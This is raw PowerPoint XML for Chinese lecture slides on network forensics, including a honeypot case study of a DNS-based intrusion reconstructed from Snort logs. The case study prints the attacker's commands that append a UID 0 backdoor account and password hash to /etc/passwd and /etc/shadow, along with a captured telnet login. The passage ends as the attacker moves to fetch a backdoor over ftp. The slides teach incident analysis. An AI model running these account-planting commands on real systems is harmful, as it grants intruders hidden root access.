                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主要采用了隧道技术、加解密技术、密钥管理技术和使用者与设备身份认证技术。</a:t>
            </a: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6.5.5 对检查和分析的建议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1131590"/>
            <a:ext cx="7056784" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络通信中数据使用的几点重要的建议：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    2．应该提供充分的网络活动日志的存储容量：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>要评估典型的和峰值的日志使用，以决定基于机构策略下，几小时或几天的数据需要留存，保证系统和应用程序有足够可利用的数据储备。与计算机安全事件有关的日志，相对于其他的日志应该保存更长的时间。</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6.5.5 对检查和分析的建议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1131590"/>
            <a:ext cx="7056784" cy="1430020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络通信中数据使用的几点重要的建议：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    3．应该优化配置数据源，加强信息收集的能力：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应当时时注意升级和更新可操作性更好的做法，来提高网络的取证分析能力。企业应该周期性地进行评估，调整数据源的设置，优化相关信息的捕获能力。</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6.5.5 对检查和分析的建议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1131590"/>
            <a:ext cx="7056784" cy="1430020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络通信中数据使用的几点重要的建议：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    4．分析人员应该有相当综合的技术知识：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>因为现在工具的分析能力相当有限，分析人员应该经过很好的训练，有一定的经验，还有关于网络原理，常见网络，应用协议，网络和应用安全产品方面，以及基于网络的威胁和攻击方法的丰富知识。</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6.5.5 对检查和分析的建议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1131590"/>
            <a:ext cx="7056784" cy="1430020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络通信中数据使用的几点重要的建议：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    5．分析人员应该考虑每一个数据源的真实性和价值：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>相对于从其他数据源接收规范化数据的数据源，分析人员应该对原始信息源更有信心。分析人员应该根据对数据的解释验证任何异常或意料之外的数据，例如IDS和SEM报警。</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6.5.5 对检查和分析的建议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1131590"/>
            <a:ext cx="7056784" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络通信中数据使用的几点重要的建议：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    6．分析人员应该关注事件的特征和影响：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>判定攻击者的身份和其他相似活动是典型的耗时而且很难完成的工作，而且对于修正操作问题或安全弱点没有什么帮助。确定攻击者的身份和意图是重要的，特别是当进行犯罪调查时，但也应该权衡其他重要的目的，比如阻止攻击和恢复系统和数据。</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619293" y="1337721"/>
            <a:ext cx="2034540" cy="156845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smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="003466"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>6.6</a:t>
            </a:r>
            <a:endPar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614" y="2115293"/>
            <a:ext cx="1781944"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3654088" y="2114024"/>
            <a:ext cx="5644852" cy="7892"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="95250" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="003466"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7213600" y="2785745"/>
            <a:ext cx="1930400" cy="2325370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3653790" y="1661160"/>
            <a:ext cx="4398010" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0"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网络取证与分析实例</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4"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 网络取证与分析实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1131590"/>
            <a:ext cx="7056784" cy="1383665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下面是一个利用蜜罐进行网络入侵取证分析的例子。此例中的蜜罐按缺省选项配置为服务器的Red Hat 6.0，嗅探器和入侵检测系统选用的是Snort，嗅探信息以snort的格式给出。被监控的黑客的代号为“黑帽（black-hat）”。蜜罐的IP地址是172.16.1.107，证据中出现的其他IP地址都是“黑帽”使用的。</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6.6.1 发现攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830580" y="608330"/>
            <a:ext cx="7482840" cy="4338320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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4月26日6点43分，snort发出告警，报告系统遭到“noop”攻击。此时snort已经检测到此攻击并把报警信息写入/var/log/messages文件中监控（由swatch监控）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endPar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algn="ctr" fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="15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Apr 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 –&gt; 172.16.1.107:53</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endPar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50000"/>
              </a:lnSpc>
            </a:pP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虽然蜜罐每天会受到无数的探测、扫描和查询。但是这样的告警应当立刻引起注意，因为它说明系统安全可能受到威胁。不出所料，不到两分钟后，系统日志就报告系统安全受到威胁，因为攻击者已登录到陷阱机上。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endPar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algn="ctr" fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="15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Apr 26 06:44:25 victim7 PAM_pwdb[12509]:(login) session opened for user twin by (uid=0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="15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Apr 26 06:44:36 victim7 PAM_pwdb[12521]:(su) session opened for user hantu by twin(uid=506)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endPar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50000"/>
              </a:lnSpc>
            </a:pP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可以看出，入侵者已经获得超级用户访问权，正在操作系统。这是如何完成的，到底发生了什么？下面就逐步展开取证分析，把各条线索综合起来。</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6.6.2 初步分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830580" y="878840"/>
            <a:ext cx="7482840" cy="1430020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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研究一个攻击时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" u="sng"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最佳的出发点是从黑客的思路考虑问题</a:t>
            </a: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黑客通常从信息收集开始，因为入侵前他们必须确定系统的弱点。如果系统安全已经遭到破坏，通常已经不是黑客第一次与系统通信了。大多数攻击发起前已经进行了各种类型的信息收集。因此，取证分析的第一步就是找到黑客收集信息阶段的证据。</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6.6.2 初步分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830580" y="792480"/>
            <a:ext cx="7482840" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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根据上面的报警信息可以看出，攻击发生在53端口，这说明系统遭受了DNS攻击。因此可以首先查看snort的报警，找到可能的DNS探测信息，的确可以发现一个来自攻击系统的DNS翻译请求探测记录：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endPar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5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Apr 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query:63.226.81.13:4499-&gt; 172.16.1.107:53</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="15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Apr 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query:63.226.81.13:4630-&gt; 172.16.1.101:53</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="14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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="14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50000"/>
              </a:lnSpc>
            </a:pP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探测日期是4月25日，而系统是在4月26日遭到攻击的，即系统安全是在探测后一天遭到破坏的。黑客可利用自动扫描工具对众多系统进行扫描以寻找著名的DNS弱点。扫描结束后，黑客检查扫描结果，找到易受攻击的系统，然后发起攻击。根据IDS报警可以看出，系统似乎是受到一个名为script kiddie工具的DNS攻击。那么攻击是如何发起，如何进行的呢？这就需要进一步调查。</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6.1.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>专用网络取证</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1275606"/>
            <a:ext cx="7165712" cy="1648208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第一类专用网络的取证和分析鉴定相对传统的网络取证和分析鉴定而言，较为简单，传统的网络取证和分析鉴定技术完全可以覆盖。对于第二类专用网络的取证和分析鉴定，只要对其特殊性多加注意，例如对于隧道技术、加解密技术、密钥管理技术和认证技术加强取证和分析鉴定，一方面，可能加大网络取证和分析鉴定的工作量和复杂性，另一方面，也可能获取更优质的网络证据，其关联性、客观性和合法性更加充分。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="14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6.6.3 现场重建</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830580" y="792480"/>
            <a:ext cx="7482840" cy="3199765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="14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1．入侵过程：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="12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通常，snort能显示所有IP的相关数据，利用这一性能可以分析攻击者的入侵行为。入侵信息可以从snort日志中获得，它是以tcpdump二进制格式存储的。于是可以查询snort日志，并检查攻击发起时发出的包。信息查询不能仅限于主机63.336.81.13，因为攻击者可能利用其他系统来攻击。事实上，此例中攻击者也的确使用了至少3种不同的系统进行入侵。入侵的目的是要获得远程系统的root shell。一旦黑客获得root shell，他们就能用root账号运行任何命令。通常，一个账号是保存在/etc/passwd和/etc/shadow文件中的。“黑帽”获得root shell后，就作为root用户运行了以下命令：</a:t>
            </a:r>
            <a:endPar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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endPar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cd; uname –a; pwd; id；</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Linux apollo.uicmba.edu 2.2.5-15 #1 Mon Apr 19 22:21:09 EDT 1999 i586 unknown/uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)</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echo “twin::506:506::/home/twin:/bin/bash”&gt;&gt; /etc/passwd</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echo “twin:w3nT2H0b6AjM2:::::::”&gt;&gt; /etc/shadow</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echo “hantu::0::0/:/bin/bash”&gt;&gt; /etc/passwd</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echo “hantu:w3nT2H0b6AjM2:::::::”&gt;&gt; /etc/shadow</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6.6.3 现场重建</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830580" y="792480"/>
            <a:ext cx="7482840" cy="1706880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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不难看出，“黑帽”作为root用户运行了几个命令。首先，确认其所在的系统（uname -a）、目录（pwd）和他的uid（id）。然后增加了两个密码相同的用户账号twin和hantu，并且账号twin的UID是506，账号hantu的UID是0。大多数系统都不允许UID为0的账号。这样，“黑帽”对DNS进行入侵，获得root shell并插入两个账号。90秒钟后，他远程登录到陷阱机上，获得root访问权限（参见以下日志的时间戳）。那么，下一步他会做什么呢？</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6.6.3 现场重建</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830580" y="792480"/>
            <a:ext cx="7482840" cy="3307715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="16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2．获得访问权限的过程：</a:t>
            </a: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Telnet是一个明文协议，数据没有加密，这样就能获得入侵的轨迹，并得到“黑帽”的所有击键行为。Snort可以自动进行这些操作，通过snort捕获telnet会话中的击键行为，可以确定“黑帽”所进行的操作，下面检查telnet会话并确定“黑帽”的行为。首先，“黑帽”用twin账号213.28.22.189登录到陷阱机上，然后用hantu账号获得超级用户访问。他不能用hantu这一账号远程登录，因为UID为0的账号不能进行远程访问。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endPar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’9600,9600’VT5444VT5444</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Red Hat Linux release 6.0 (Shedwig) Kernel 2.2.5-15 on an i586</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login: twin</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Password: Password: hax0r</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No directory /home/twin!</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Logging in with home=”/”.</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[twin@apollo/]$su hantu</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Password: Password: hax0r</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6.6.3 现场重建</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830580" y="496570"/>
            <a:ext cx="7482840" cy="3507740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="14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接着，“黑帽”通过ftp连接到另一个系统以获取后门程序。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
